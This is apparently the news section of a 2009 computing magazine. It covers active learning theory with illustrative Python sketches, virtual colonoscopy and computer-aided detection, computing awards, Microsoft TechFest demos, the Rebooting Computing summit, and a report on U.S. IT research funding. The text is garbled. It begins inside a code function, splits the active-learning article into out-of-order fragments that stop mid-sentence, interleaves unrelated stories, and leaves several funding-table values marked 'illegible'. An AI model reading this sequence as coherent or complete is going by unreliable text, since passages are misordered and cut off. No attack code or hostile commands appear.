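) -> Tuple[float, int]:
    """Estimate the mean loss over all examples while labeling only some of them.

    Example i is labeled with probability probs[i]; a labeled example counts
    with weight 1 / probs[i], so rarely chosen points count for more.
    Returns (estimated mean loss, number of labels requested).
    """
    total = 0.0
    requested = 0
    for loss, p in zip(losses, probs):
        if rng.random() < p:          # the learner asks the teacher for this label
            requested += 1
            total += loss / p         # importance weight = 1 / selection probability
    return total / len(losses), requested


# Hypothetical data: per-example losses and the probability each was selected.
losses = [1.0, 0.0, 0.0, 1.0, 1.0, 0.0, 0.0, 0.0]
probs = [0.9, 0.1, 0.5, 0.2, 0.6, 0.3, 1.0, 0.4]
true_mean = sum(losses) / len(losses)

rng = random.Random(0)
trials = [importance_weighted_mean(losses, probs, rng) for _ in range(20000)]
avg_estimate = sum(est for est, _ in trials) / len(trials)
avg_labels = sum(n for _, n in trials) / len(trials)
print(f"true mean {true_mean:.3f}, weighted estimate {avg_estimate:.3f}, "
      f"labels per round {avg_labels:.2f} of {len(losses)}")
```

Weighting by 1/p is what lets an unlikely but informative point pull the estimate as much as it should; the price is higher variance when some selection probabilities are very small.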


Putting Theory Into Practice 

With several solid years of theoretical work behind them, the active learning researchers are beginning to tackle an even larger challenge than developing the theoretical underpinnings of active learning. Now, they are trying to link theoretical algorithms with large-scale applications.

“There’s a striking difference between what’s known in practice and theory with active learning,” says Hsu. “The theory is trying to catch up with what is known about what works well in practice, and to be able to say something mathematical about what works and what doesn’t.”

The University of Pennsylvania’s Wortman agrees. “[Active learning] is used quite frequently in practice with impressive results, and it’s a subject of increasing interest in the theory community, but there’s still a huge gap between theory and practice. At a fundamental level, we don’t really know ‘why’ the particular active learning algorithms that are used in practice work.”

Toward that goal, some theorists are looking to find general methods of building algorithms that can be used in any situation. General-purpose algorithms have existed for decades in passive learning. With active learning, however, an algorithm must be built almost from scratch for each new application.

At Carnegie Mellon, Hanneke is working on a type of “meta-algorithm” that can take established passive learning algorithms and churn out an active learning algorithm that uses those passive learning algorithms as subroutines. His hope is that this new work, which he calls “activized learning,” will combine the benefits of established passive learning algorithms with the guaranteed improvements that active learning offers in the number of labels needed.

Maria-Florina Balcan, a postdoctoral researcher with Microsoft Research New England, believes that active learning algorithms are too delicate for such a general method to exist. Instead, Balcan is broadening the types of interaction that active learning can handle beyond just labeling unlabeled examples. She points out that in some situations another method of interaction might be more natural.

Take the example of trying to classify images of people by gender, says Balcan. If the interaction is changed, the teacher might be able to complain to the learner that some classifiers are too general and need to be split, or that some are too similar and need to be merged. The teacher might suggest a new class to be added, or notice that the learner is making certain mistakes and suggest a new zone that will eliminate those classification errors.

“Much of the theoretical and practical work on active learning was developed on a very specific model and function of interaction,” says Balcan. “But the interaction could be different. The main direction that I see for improvement in the future is extending the type of interaction between the learning algorithm and the user.”

Given the progress made in the past several years, with more horizons opening up, the future of active learning appears to be very promising. “We now have active learning algorithms providing substantial guarantees on performance while relying on relatively minimal assumptions about the world,” notes John Langford, doctor of learning at Yahoo! Research. “We have a reasonable understanding of where and when they provide performance improvements over passive learning. These algorithms are also practical, often yielding substantial savings in label complexity over passive learning approaches.”


Graeme Stemp-Morlock is a science writer based in Waterloo, Ontario, Canada.
News

Research & Development

U.K. Funding Fosters Innovation

The computational thinking that drives the field of computer science is a key tool for solving problems, designing systems, and understanding human behavior in many disciplines, according to a panel of international experts in Computer Science and Informatics (CS&I). The findings of the project, the Research Assessment Exercise 2008, confirmed the U.K. as a top-ranked research power among industrialized countries.

The survey reported an increase in the influence of computer science on other disciplines, including bioinformatics, medicine, and e-health. It also found that more computer science research used mathematics to quantify the complexity and rigor of calculations. The analysis also found that research funding for CS&I for the period 2001 to 2008 more than doubled, from $376 million in 2001 to $763 million, leading participants to conclude that continued commitment to funding research and innovation is necessary to maintain global excellence in a battered economy.

The review of research in CS&I surveyed 81 colleges and universities and found the subject not only healthy and growing, but more rigorous, interdisciplinary, experimental, and user-oriented than ever.
“The vitality of the computing field, which is due in large measure to increased investment in research, is directly related to the degree of innovation that emerges from U.K. research institutions,” says ACM President Dame Wendy Hall, who participated in the survey’s computer science panel. “These innovations, in turn, foster research partnerships with startup companies as well as spinouts and collaborations with subject matter experts and multinational corporations. The resulting level of economic activity crosses into all industries, even creating new sectors that provide career opportunities in the computing and information technology field.”
will be needed to tell the difference between, for instance, a spam email message offering you a free cruise and an email message from your parents telling you about their Alaskan cruise.

“By allowing the algorithm to interactively choose the ‘most informative’ samples to be labeled, the algorithm will be able to produce a much more accurate model using fewer labeled samples, meaning that we have to do a lot less tedious labeling by hand to get accurate prediction models,” says Jenn Wortman, a Ph.D. student at the University of Pennsylvania. “It is possible to prove that in some special cases, active learning algorithms can produce models with the same accuracy as models built by passive learning algorithms while requiring exponentially fewer labeled examples.”

Information Overload

Of course, deciding what makes an example informative or not is a huge challenge. Little progress had been made until 2005 when Sanjoy Dasgupta, a professor of computer science at the University of California, San Diego, published a paper, “Coarse Sample Complexity Bounds for Active Learning,” which quantified how many labeled examples are needed to find a pattern with active learning compared with passive learning. The number was significantly smaller with active learning, but some basic assumptions were needed to see such dramatic outcomes.
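One common heuristic for deciding which example is “most informative” is uncertainty sampling: label the pool point the current model is least sure about. The Python sketch below is illustrative only. It assumes two classes (0 and 1), a simple nearest-centroid classifier, and a margin score equal to the difference between a point’s distances to the two class centroids; the function names, seed points, and data are hypothetical, and none of it is taken from the researchers quoted here.

```python
import math
from typing import Callable, Dict, List, Sequence, Tuple

Point = Tuple[float, float]


def centroids(labeled: Dict[Point, int]) -> Dict[int, Point]:
    """Mean position of the labeled points in each class."""
    sums: Dict[int, List[float]] = {}
    for (x, y), label in labeled.items():
        s = sums.setdefault(label, [0.0, 0.0, 0.0])
        s[0] += x
        s[1] += y
        s[2] += 1.0
    return {label: (s[0] / s[2], s[1] / s[2]) for label, s in sums.items()}


def most_uncertain(unlabeled: Sequence[Point], labeled: Dict[Point, int]) -> Point:
    """Pick the point nearest the boundary between the class-0 and class-1 centroids."""
    c = centroids(labeled)
    return min(unlabeled, key=lambda p: abs(math.dist(p, c[0]) - math.dist(p, c[1])))


def uncertainty_sampling(
    pool: Sequence[Point],
    oracle: Callable[[Point], int],
    seeds: Sequence[Point],
    budget: int,
) -> Dict[Point, int]:
    """Label the seeds, then spend `budget` more queries on the most ambiguous points."""
    labeled = {p: oracle(p) for p in seeds}   # seeds must cover both classes
    unlabeled = [p for p in pool if p not in labeled]
    for _ in range(budget):
        if not unlabeled:
            break
        p = most_uncertain(unlabeled, labeled)
        labeled[p] = oracle(p)                # ask the teacher for one label
        unlabeled.remove(p)
    return labeled


# Hypothetical 1-D data laid out on the x-axis; the true boundary is at x = 5.5.
pool = [(float(i), 0.0) for i in range(11)]


def teacher(p: Point) -> int:
    return int(p[0] >= 5.5)


print(uncertainty_sampling(pool, teacher, seeds=[(0.0, 0.0), (10.0, 0.0)], budget=2))
```

With two extra queries, the sketch spends its labels at x = 5 and x = 6, the two points straddling the boundary, rather than on the easy points near either end.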

One of the most problematic assumptions was that there could be no mislabeled examples causing noise, an assumption that would be unreasonable in real-world applications. The following year, however, Maria-Florina Balcan, Alina Beygelzimer, and John Langford published a paper, “Agnostic Active Learning,” which described the first active learning algorithm that could work with noise but still provided improvement over passive learning. The algorithm, A², labeled examples from a region of disagreement at random, eliminating certain hypotheses until a pattern emerged that was as close as possible to a true understanding.
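The idea of labeling points from a region of disagreement and discarding inconsistent hypotheses can be sketched in Python. This is a simplified, noise-free variant in the spirit of the earlier Cohn-Atlas-Ladner (CAL) approach, not A² itself: A² is designed to tolerate noise and relies on statistical bounds rather than eliminating hypotheses on a single label. The finite class of threshold hypotheses, the pool, and the function names below are assumptions for illustration.

```python
import random
from typing import Callable, List, Sequence, Tuple

Hypothesis = Callable[[float], int]


def disagreement_region(version_space: Sequence[Hypothesis], pool: Sequence[float]) -> List[float]:
    """Pool points on which the surviving hypotheses do not all agree."""
    return [x for x in pool if len({h(x) for h in version_space}) > 1]


def disagreement_learn(
    hypotheses: Sequence[Hypothesis],
    pool: Sequence[float],
    oracle: Callable[[float], int],
    rng: random.Random,
) -> Tuple[List[Hypothesis], int]:
    """Query random points from the region of disagreement until it is empty.

    Assumes labels are noise-free and that some hypothesis matches the oracle.
    Returns the surviving hypotheses and the number of labels requested.
    """
    version_space = list(hypotheses)
    requested = 0
    region = disagreement_region(version_space, pool)
    while region:
        x = rng.choice(region)
        y = oracle(x)
        requested += 1
        # Eliminate every hypothesis that contradicts the new label.
        version_space = [h for h in version_space if h(x) == y]
        region = disagreement_region(version_space, pool)
    return version_space, requested


def threshold(t: float) -> Hypothesis:
    """Hypothesis that labels x as 1 when x >= t, else 0."""
    return lambda x: int(x >= t)


# Hypothetical setup: 101 candidate thresholds and 100 unlabeled points.
hypotheses = [threshold(t) for t in range(101)]
pool = [i + 0.5 for i in range(100)]
oracle = threshold(37)
survivors, requested = disagreement_learn(hypotheses, pool, oracle, random.Random(0))
print(f"{requested} labels requested; {len(survivors)} hypotheses survive")
```

Because every query lands where the surviving hypotheses still disagree, the learner never pays for a label that all remaining candidates would predict the same way.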

One of the major improvements of A² was in learning a threshold function. With passive learning, every piece of data between two bounds must be analyzed before the threshold can be reliably established. With active learning, however, the algorithm can narrow down the threshold value in what is almost a binary search, resulting in exponentially fewer labels.
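The threshold example can be made concrete with a short Python comparison. It assumes noise-free labels that are 0 below an unknown threshold and 1 at or above it, the setting where the binary-search argument is cleanest (A² itself also handles noise). The passive learner labels every point; the active learner binary-searches the sorted pool, so it needs about log2(n) labels instead of n. The function names and data are hypothetical.

```python
from typing import Callable, Sequence, Tuple

Oracle = Callable[[float], int]


def passive_threshold(points: Sequence[float], oracle: Oracle) -> Tuple[int, int]:
    """Label every point, then find the first positive one in sorted order.

    Returns (index of the first positive point, number of labels used).
    """
    xs = sorted(points)
    labels = [oracle(x) for x in xs]  # n labels
    first = next((i for i, y in enumerate(labels) if y == 1), len(xs))
    return first, len(xs)


def active_threshold(points: Sequence[float], oracle: Oracle) -> Tuple[int, int]:
    """Binary-search the sorted pool for the first positive point.

    Invariant: every index below `lo` is labeled 0 and every index at or
    above `hi` is labeled 1. Returns (first positive index, labels used).
    """
    xs = sorted(points)
    lo, hi, queries = 0, len(xs), 0
    while lo < hi:
        mid = (lo + hi) // 2
        queries += 1
        if oracle(xs[mid]) == 1:
            hi = mid        # threshold is at or before mid
        else:
            lo = mid + 1    # threshold is after mid
    return lo, queries


points = [float(i) for i in range(1024)]


def oracle(x: float) -> int:
    return int(x >= 700.0)  # hypothetical hidden threshold


print("passive:", passive_threshold(points, oracle))
print("active: ", active_threshold(points, oracle))
```

For 1,024 unlabeled points, the passive learner uses all 1,024 labels while the binary search needs at most 11, which is the exponential gap described above.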

Additional research by Hanneke demonstrated that the algorithm performed well as long as the samples in the region of disagreement weren’t too diverse and didn’t differ in too many ways. Also, further refinements addressed the sampling bias created by labeling only the most informative examples. In essence, the labeled examples were not being chosen at ran-


Computer Science Awards

The National Academy of Engineering was among several professional societies that recently honored a select group of researchers for their distinguished contributions to the field of computer science.

2009 EATCS AWARD
The European Association for Theoretical Computer Science (EATCS) honored Gérard Huet, director of research at the French National Institute for Research in Computer Science and Control, with the 2009 EATCS award, in recognition of his distinguished career in theoretical computer science.

TSUTOMU KANAI AWARD
Willy Zwaenepoel, a professor of computer science and director of the Computer Systems Laboratory at Rice University, won the IEEE Computer Society Tsutomu Kanai Award for major contributions to state-of-the-art distributed computing systems and their applications.

NAE MEMBERS
The National Academy of Engineering elected 65 new members and nine foreign associates for outstanding contributions to “engineering research, practice, or education, including, where appropriate, significant contributions to the engineering literature,” and to the “pioneering of new and developing fields of technology, making major advancements in traditional fields of engineering, or developing/implementing innovative approaches to engineering education.” Fourteen computer scientists are among the new members and foreign associates. They are:
> Paul M. Anderson, consultant, Power Math Associates;
> Sergey Brin, co-founder and president of technology, Google;
> William J. Dally, William R. and Inez Kerr Bell Professor of Computer Science, Stanford University;
> Jeffrey Dean, Google Fellow, Google;
> Jack B. Dennis, professor emeritus, Computer Science and Artificial Intelligence Laboratory, Massachusetts Institute of Technology;
> Deborah L. Estrin, director, Center for Embedded Networked Sensing, University of California, Los Angeles;
> Sanjay Ghemawat, Google Fellow, Google;
> Paul C. Kocher, founder, president, and chief scientist, Cryptography Research Inc.;
> C. Mohan, IBM Fellow, IBM Almaden Research Center;
> Mendel Rosenblum, associate professor of computer science and of electrical engineering, Stanford University;
> Gurindar S. Sohi, John P. Morgridge Professor and E. David Cronon Professor of Computer Sciences, departments of computer sciences and electrical and computer engineering, University of Wisconsin, Madison;
> John A. Swanson, president, Swanson Analysis Services Inc.;
> William L. “Red” Whittaker, Fredkin Professor of Robotics, The Robotics Institute, Carnegie Mellon University;
> Peter T. Kirstein, professor, department of computer science, University College London.

SLOAN RESEARCH FELLOWS
The Alfred P. Sloan Foundation awarded two-year fellowships to 118 researchers, including 16 computer scientists, “in recognition of distinguished performance and a unique potential to make substantial contributions to their field.” The computer scientists are: Scott Aaronson, MIT; Luis von Ahn, Carnegie Mellon University; Shuchi Chawla, University of Wisconsin, Madison; Kevin Fu, U. of Massachusetts, Amherst; Odest Chadwicke Jenkins, Brown University; David Kempe, University of Southern California; James Russell Lee, University of Washington; Zhuoqing Morley Mao, University of Michigan; Kamesh Munagala, Duke University; Tze Sing Eugene Ng, Rice University; Ryan William O’Donnell, Carnegie Mellon University; Fabio Pellacini, Dartmouth College; Ramesh Raskar, MIT; Alex C. Snoeren, University of California, San Diego; René Vidal, Johns Hopkins University; and Steve Zdancewic, University of Pennsylvania.
Learning More About Active Learning

Active learning algorithms are producing substantial savings in label complexity over passive learning approaches.


IF YOUR EMAIL address has ever landed on a spammer’s list, you know what it’s like for your inbox to be flooded with junk email day after day after day. To prevent this, spam filters were created, relying on a mixture of brute-force computing with passive learning and refined processing with active learning. And while spam filters have become more sophisticated and your inbox is increasingly free of junk email, the theory behind active learning has lagged. In the last few years, however, the field has taken off.

“There’s been surprisingly rapid progress,” says Steve Hanneke, a Ph.D. student at Carnegie Mellon University. “If you look back five years, there was really very little known about what makes something an informative example, how important are they, and how much improvement we can expect. But we now have in the published literature a pretty clear picture of just how much improvement we can expect in active learning and what we mean by an informative example.”

The difference between passive learning and active learning is about the teacher, and how much time the teacher wants to spend teaching. Passive learning requires large data sets, and the teacher has to label countless examples for the learner. Once every example is labeled, the data set is given to the learner, which then finds patterns that will allow it to sort future data correctly.

The obvious drawback is that passive learning requires a lot of time, and that’s where active learning enters the picture.

In active learning, all of the examples are provided to the learner unlabeled. An algorithm analyzes the unlabeled data set and asks the teacher for labels. After the algorithm determines the basic shape of each label set, it asks the teacher to label the ambiguous examples in between the various labels. By labeling only the most informative examples, the hope is that fewer labels

At Carnegie Mellon, Steve Hanneke’s new work combines the benefits of established passive learning with the guaranteed improvements of active learning in the number of labels needed.
is being addressed in a technique called low dose, which Kaufman’s group is researching with a grant from the National Institutes of Health (NIH). Another drawback of a virtual colonoscopy is that it can’t remove polyps; patients still need an optical colonoscopy for their surgical excision. However, a virtual colonoscopy study has shown that only about 7% of patients required such follow-up.

Insurers, however, have been slow to catch on. Medicare, for example, announced a tentative decision earlier this year to not pay for virtual colonoscopies. And some insurers have set up the payment codes that healthcare providers need to be reimbursed for the procedure, but the money has yet to materialize. However, Kaufman says the political will to mandate coverage is growing, and patients can pressure their insurer to pay for a virtual colonoscopy by refusing to undergo optical colonoscopy.


Early Detection 

Screening is critical because a patient’s successful outcome often hinges on the early detection of polyps. A virtual colonoscopy removes many of the uncomfortable hurdles. “Only 15%-19% of individuals eligible for screening currently undergo colon evaluation,” says Hiroyuki Yoshida, an associate professor at Harvard Medical School and director of 3D Imaging Research at Massachusetts General Hospital. “The cathartic cleansing required for bowel preparation is the biggest barrier.”

A virtual colonoscopy still requires preparation, so developing a laxative-free procedure will be indispensable to its practicality, Yoshida says. One hitch: eliminating laxatives leaves more fecal matter in the colon, which requires improvements in electronic cleansing. What’s more, patients still must ingest an oral contrast agent, such as barium or iodine, and air or carbon dioxide must still be used to distend the colon. Yet a laxative-free virtual colonoscopy could be ready for public use in the near future, Yoshida says.

Many of the challenging issues with virtual colonoscopies involve software applications. Computer-aided detection (CAD), the focus of Yoshida’s research, brings much-needed automation to electronic cleansing and polyp detection. It holds great promise, says Kaufman. “In mammography, this has been entirely successful,” he notes. “Basically, the computer is another set of eyes.”

Skill in interpreting diagnostic images varies among radiologists, who can mistake the colon’s normal valves and folds for polyps. Yoshida says CAD could make results more objective and consistent, and shorten radiologists’ learning curve. It could also be useful in hospitals that lack expertise with virtual colonoscopies.

However, CAD presents its own challenges. “Sometimes CAD’s weak spots are comparable to human viewers’ weak spots,” says Dr. Ronald Summers, a radiologist and senior investigator at NIH. One important challenge is finding flat lesions, which are harder to detect with either a virtual or an optical colonoscopy but carry a higher risk of cancer. Kaufman has co-developed a novel CAD technique, utilizing colon flattening and volume rendering, which has achieved perfect sensitivity and tolerable specificity, and could function as either a first or second reader.

Another problem is false positives: they require patients to undergo an optical colonoscopy. Of course, false positives aren’t as deadly as false negatives, and doctors can dismiss false positives with a second read. Ideally, Kaufman says, CAD should be a first reader for radiologists, who can inspect the regions flagged by it. “I think the second read is the one the radiologist should use, because it has the highest sensitivity, but we’re still working that out,” Dr. Summers says.
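Sensitivity and specificity, the two figures of merit quoted here, are simple ratios over a detector’s confusion counts. The Python sketch below shows the arithmetic; the class name and the counts are hypothetical and are not results from any study mentioned in this article.

```python
from dataclasses import dataclass


@dataclass
class ConfusionCounts:
    true_positives: int   # polyps the reader flagged
    false_negatives: int  # polyps the reader missed
    true_negatives: int   # polyp-free regions correctly left unflagged
    false_positives: int  # polyp-free regions flagged anyway

    def sensitivity(self) -> float:
        """Share of real polyps that were flagged: TP / (TP + FN)."""
        return self.true_positives / (self.true_positives + self.false_negatives)

    def specificity(self) -> float:
        """Share of polyp-free regions left unflagged: TN / (TN + FP)."""
        return self.true_negatives / (self.true_negatives + self.false_positives)


# Hypothetical reader that misses nothing but raises some false alarms.
reader = ConfusionCounts(true_positives=20, false_negatives=0,
                         true_negatives=72, false_positives=8)
print(f"sensitivity={reader.sensitivity():.2f}, specificity={reader.specificity():.2f}")
```

“Perfect sensitivity” corresponds to zero false negatives; every false positive lowers specificity and, as noted above, can send a patient to an unnecessary optical colonoscopy.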

There is also considerable debate 
Technology

TechFest 2009

Microsoft Research unveiled more than 100 innovations at its annual TechFest showcase in late February in Redmond, WA. Among the emerging technology projects were:


SECONDLIGHT

Used with Microsoft Surface, SecondLight can project images and detect gestures in mid-air above Surface’s display (in addition to supporting its multitouch capabilities). The magic behind SecondLight involves Surface’s LCD screen, which can switch between opaque and transparent, alternating 60 times per second. A pair of recessed projectors alternate flickering 30 times per second, with one projector timed to illuminate the screen when it is opaque and the second projector timed to illuminate when it is transparent. When the screen is transparent, any object held above the screen will reveal what is being output by the second projector.


RENLIFANG

When you conduct a Web search for information about a specific person (say, an ex-girlfriend), you still need to examine all of the search results and piece together the information before being able to ascertain the parameters of her social universe. Renlifang is a Web entity-summarization system that automatically creates a biography page of the person; a social-network graph for the person; a shortest relationship path between the person and someone else; titles for the person found on the Web; and all of the structured information that Microsoft possesses on the person in its local database.
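A “shortest relationship path” is a classic graph problem. If each person is a node and each known relationship an unweighted edge, breadth-first search finds a path with the fewest hops. The Python sketch below is a generic illustration on a hypothetical toy graph; it is not a description of how Renlifang itself is implemented.

```python
from collections import deque
from typing import Dict, List, Optional


def shortest_relationship_path(
    graph: Dict[str, List[str]], source: str, target: str
) -> Optional[List[str]]:
    """Breadth-first search for a fewest-hops path from source to target.

    Returns the list of people along the path, or None if they are not connected.
    """
    if source == target:
        return [source]
    parent: Dict[str, Optional[str]] = {source: None}
    queue = deque([source])
    while queue:
        person = queue.popleft()
        for neighbor in graph.get(person, []):
            if neighbor in parent:
                continue  # already reached by a path at least as short
            parent[neighbor] = person
            if neighbor == target:
                # Walk parent links back to the source, then reverse.
                path: List[str] = []
                node: Optional[str] = target
                while node is not None:
                    path.append(node)
                    node = parent[node]
                return path[::-1]
            queue.append(neighbor)
    return None


# Hypothetical, undirected social graph stored as adjacency lists.
graph = {
    "Ann": ["Bob", "Cid"],
    "Bob": ["Ann", "Dee"],
    "Cid": ["Ann", "Dee"],
    "Dee": ["Bob", "Cid", "Eve"],
    "Eve": ["Dee"],
}
print(shortest_relationship_path(graph, "Ann", "Eve"))
```

BFS visits each person and each relationship at most once, so its cost grows linearly with the size of the graph; a production system working from Web-scale data would also have to decide which relationships count as edges in the first place.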


REAL-TIME STITCHING OF MOBILE-GENERATED VIDEOS

Microsoft demonstrated a real-time system that stitches together video from multiple mobile phones to produce a wide field-of-view experience with high resolution. Possible applications include citizen journalism; virtual attendance of family events and gatherings; and emergencies in which citizens provide a real-time video feed for first responders before they reach the scene of the emergency.
on how to best combine 2D and 3D imagery. “We seem to be moving to a consensus that the sensitivity and specificity of 2D and 3D are comparable,” Dr. Summers says. “The question is which one do you use as your primary.” Yoshida thinks CAD could soon replace 3D visual fly-throughs for first reads, though expert examination of 2D images (what radiologists call “problem solving”) will still be needed.

2D is important in a virtual biopsy, which depends on flattening the images to simulate what pathologists do when dissecting a polyp. “They will slice it along its length and lay it flat and look at it,” Dr. Summers says. “You do the same thing on the computer.” Some experts, he notes, think such 2D dissection provides faster diagnoses than a 3D fly-through.

“The examination is done on the data, rather than the patient,” says Dr. C. Daniel Johnson.

Seeking Improvements

Medical and computer-science researchers are striving to make virtual colonoscopy technology more accurate, affordable, easier to use, and patient friendly.

A technique called dual-energy imaging, for instance, highlights polyps by blending images derived from different radiation doses to increase contrast, Yoshida says. And graphics processing unit-based rendering, an approach Kaufman’s group has taken, is being touted as a faster method of getting images to radiologists. Also, Dr. Summers says he and his collaborators have figured out how to bolster CAD with wavelets on manifolds to reduce false positives by more precisely characterizing polyps. And machine learning and neural nets are the subject of ongoing research.

To increase virtual colonoscopies’ usability, computer scientists are also focusing attention on the PCs that are used for analyzing images. One possibility is off-site image processing, which Yoshida says Massachusetts General Hospital is ready to implement.


Others hope to democratize virtual colonoscopies by getting the software to run effectively on desktop and laptop computers. For example, the Redmond, WA, company FiatLux Imaging employs Direct3D, the graphics technology used in video games, for virtual colonoscopies. “It’s usually required to run on very heavy-duty, expensive hardware,” says Rosemary Fisher, FiatLux’s clinical application specialist. “That is prohibitively expensive for small hospitals and clinics.” Many of them lack colonography software and have little financial incentive to invest in it before insurers start uniformly reimbursing for virtual colonoscopies. But as spiral CT scanners become more broadly distributed, affordable volume-rendering software, such as FiatLux’s Visualize, might make virtual colonoscopies more available in remote places via telemedicine.

The takeaway message is that virtual colonoscopies are poised to dramatically increase successful colon screening outcomes. Says Kaufman, “We’re going to save 50,000 lives every year just in the U.S.”


David Essex is a freelance science writer based in Peterborough, NH.
Computer Graphics

Catmull Wins Second Oscar

ACM Fellow Ed Catmull, a computer scientist, co-founder of Pixar Animation Studios, and president of Walt Disney and Pixar Animation Studios, received the Gordon E. Sawyer Award from the Academy of Motion Picture Arts and Sciences in recognition of his lifetime of technical contributions and leadership in the field of computer graphics for the motion-picture industry. Catmull was presented with an Oscar statuette at the Scientific and Technical Awards Presentations last February at the Beverly Wilshire Hotel.

“Ed is one of the rare individuals who can bridge the space between science and art,” said Academy President Sid Ganis. “His vision, ingenuity, and groundbreaking designs have made the impossible possible for filmmakers and movie audiences around the world.”

Catmull, who delivered a keynote address at SIGGRAPH 2008, has described ACM SIGGRAPH as his “home community.” He is regarded as an innovator by the community for his key contributions to fundamental computer graphics concepts like z-buffer and subdivision surfaces, and has held several leadership positions in SIGGRAPH over three decades. In 1995, Catmull became an ACM Fellow, and was cited for “his many and noteworthy advances in computer graphics as an individual researcher, as an inspiring leader in the field, as a director of organizations, and as a mentor for many.”

In the course of his career, Catmull founded the computer graphics laboratory at the New York Institute of Technology as well as the computer division of Lucasfilm Ltd., and Pixar Animation Studios.

In 2000, Catmull and his team received an Oscar for an Academy Award of Merit for their significant advancements to the field of motion picture rendering as illustrated in Pixar’s RenderMan. He previously received two Scientific and Engineering Awards from the Academy. In 1992, he was part of a team recognized for the development of RenderMan software. In 1995, he was on a team honored for pioneering inventions in Digital Image Compositing. He also shared a Technical Achievement Award from the Academy in 2005.
Time to Reboot

A diverse, international group of more than 200 attendees met at the Rebooting Computing Summit to address the problems confronting computer science.

THE CHALLENGES FACING the computing field are well known: enrollment in degree programs has steadily declined since 2001; women and minorities are underrepresented; many K-12 students have a negative perception of computing; and reports say the innovation rate in the field has decreased.

To address these formidable challenges, a group of more than 200 participants from many sectors touched by computing, including business, education, government, engineering, and science, held a three-day Rebooting Computing Summit at the Computer History Museum in Mountain View, CA, last January.

The meeting comes at a critical time for the computing field, says Peter Denning, chairman of the computer science department at the Naval Postgraduate School in Monterey, CA, and organizer of the invitational summit.

“According to the last figures I saw, the total number of computer science students in the pipeline and expected to graduate is about two-thirds of the number of jobs needing to be filled,” Denning says. “These are rewarding jobs, demanding creativity.”

In addition to the inadequate number of computer science students, another disturbing reality is that key meetings of the leaders in science don’t regularly include computer scientists. “Computer science is often not at the table,” Denning says, “and that hurts science badly.”

Denning and a like-minded 18-member team decided that previous workshops and studies devoted to these issues hadn’t produced enough impact. It was time to try something different, so they invited a diverse, international group representing all major sectors of computing to meet, share ideas, find common ground, and take action.

Attendees say the summit succeeded in generating excitement in a community that’s been frustrated in its efforts to attract young people and collaborators, and report that they’re eager to continue the momentum started at the event.

Conference organizer Peter Denning, left, and facilitator Ron Fry prepare before the start of the Rebooting Computing Summit, which was held at the Computer History Museum.

“The most exciting part of the meeting was getting together with people who all share a passion for computer science and a common goal of working to help revitalize the field,” says Robb Cutler, past president of the Computer Science Teachers Association. The summit fostered connections among people with an interest in K-12 computer science programs, Cutler says.

Tim Bell, associate professor at the University of Canterbury in New Zealand, says the summit brought together many people in an environment that seeded a lot of cooperation. “Not only did I meet people interested in the same kind of project, but there was the energy and impetus to do something cooperative on a global scale,” Bell says.

The summit’s main achievement was the formation of 15 action groups that will carry out projects in the coming year. These groups include Image of Computing, Defining Computer Science, and K-8 FUNdamentals. Each group created a mission statement and a list of actions they plan to accomplish during the next year.

The Rebooting Computing Web site, rebootingcomputing.org, lists the groups, members, and contact information, and incorporates collaborative tools such as blogs, social networks, and wikis. Denning is encouraged by the activity he’s seen since the summit, such as the appearance online of several videos about the conference.

“The loss of attraction to [computing] 
comes from our being unable to commu- 
nicate the magic and beauty of the field,” 
Denning says. “We need to create an 
appreciation for the elegance and power
of what computing can do.”


Bob Violino is a writer based in Massapequa Park, NY, 
who covers business and technology. 
IT Ecosystem in Peril


Experts warn the U.S. may soon relinquish 
its leadership role in IT research and development. 


THE DEBATE IN Washington, D.C. over strengthening the nation’s infrastructure shouldn’t focus only on roads and bridges. To keep the U.S. economy healthy for years to come, policymakers must also bolster another vital infrastructure: the IT industry’s research and development ecosystem.
That’s one of the conclusions of Assessing the Impacts of Changes in the Information Technology R&D Ecosystem: Retaining Leadership in an Increasingly Global Environment, a 166-page report created by a National Research Council panel and released by the National Academy of Sciences in January.

The study’s 12-member panel, con- 
sisting of IT leaders in academia, ven- 
ture capital, and industry, examined the 
threats to U.S. prominence as a world 
IT leader. “The report says the U.S. risks 
ceding IT leadership to other nations 
within a generation, and I think that’s 
absolutely true,” says Ed Lazowska, a 
committee member and Bill & Melinda 
Gates chair in computer science and en- 
gineering at the University of Washing- 
ton. “People should be seriously con- 
cerned about the entire ecosystem.” 

The response, according to the 
study, should be to build U.S. strengths 


in “conceptualizing idea-intensive 
new concepts, products, and servic- 
es.” For that it needs the “best-funded, 
most-creative” research institutions, 
world-leading technical and entrepre- 
neurial talent, and advanced technol- 
ogy infrastructures, in particular for 
next-generation wireless broadband 
communications. 

But some specific recommendations
may be controversial during an
economic downturn, including calls for 
additional government spending and 
increases in the number of H-1B visas 
for foreign nationals. 


Reassess R&D Funding


Although the report doesn’t recommend funding goals, Lazowska says the Obama administration should reassess R&D funding priorities. “We should be investing in research that’s going to create the infrastructure we need five, 10, and 15 years from now,” Lazowska says.

To do this, funding authorities should consider IT’s contribution to the economy, says Randy H. Katz, co-chair of the study and professor of electrical engineering and computer science at the University of California, Berkeley. “Do a fair assessment of the impact of IT on the economy. By that [measure] a lot of the growth in the U.S. domestic product can be attributed to productivity growth related to the effective use of information technology,” he says.

Comparison of U.S., Japanese, and European Union estimated public funding of civilian information technology and communications research and development (in billions of dollars)

Year | United States | Japan | European Union
1999 | illegible | 1.9 | 2.7
2000 | illegible | 2.1 | 2.9
2001 | 1.6 | 2.3 | 3.0
2002 | illegible | 2.5 | 3.3
2003 | illegible | 2.6 | illegible
2004 | 1.9 | illegible | 3.4
2005 | 1.8 | 2.1 | 3.5

Source: Assessing the Impacts of Changes in the Information Technology R&D Ecosystem: Retaining Leadership in an Increasingly Global Environment, National Research Council, 2009

Recommendations for helping the 
nation remain a magnet for technical 
talent include strengthening comput- 
ing education, and more controversial- 
ly, expanding the number of H-1B visas 
issued to permit foreign nationals to 
study and work in the U.S. 

Some U.S. citizens believe H-1B vi- 
sas enable foreign nationals to take 
jobs from Americans and depress IT 
salaries. But the study argues for flex- 
ibility and recommends that the per- 
mits favor those with advanced degrees 
who subsequently work in the U.S. to 
create new products and companies, 
Katz explains. 

The alternative is to allow interna- 
tional students to receive U.S. tax dol- 
lars for research and education “and 
then send those students back to their 
home countries to compete against us,” 
warns Dan Reed, scalable and multicore 
computing strategist with Microsoft Re- 
search and a member of the study’s re- 
view committee. 

Finally, to fuel the economy’s ability to encourage new companies, policymakers should reduce the “friction” caused by regulations such as the Bayh-Dole Act, which governs university intellectual property issues. “What’s a modest burden for a major multinational can be a huge legal or regulatory burden for four guys in a garage,” Reed says.
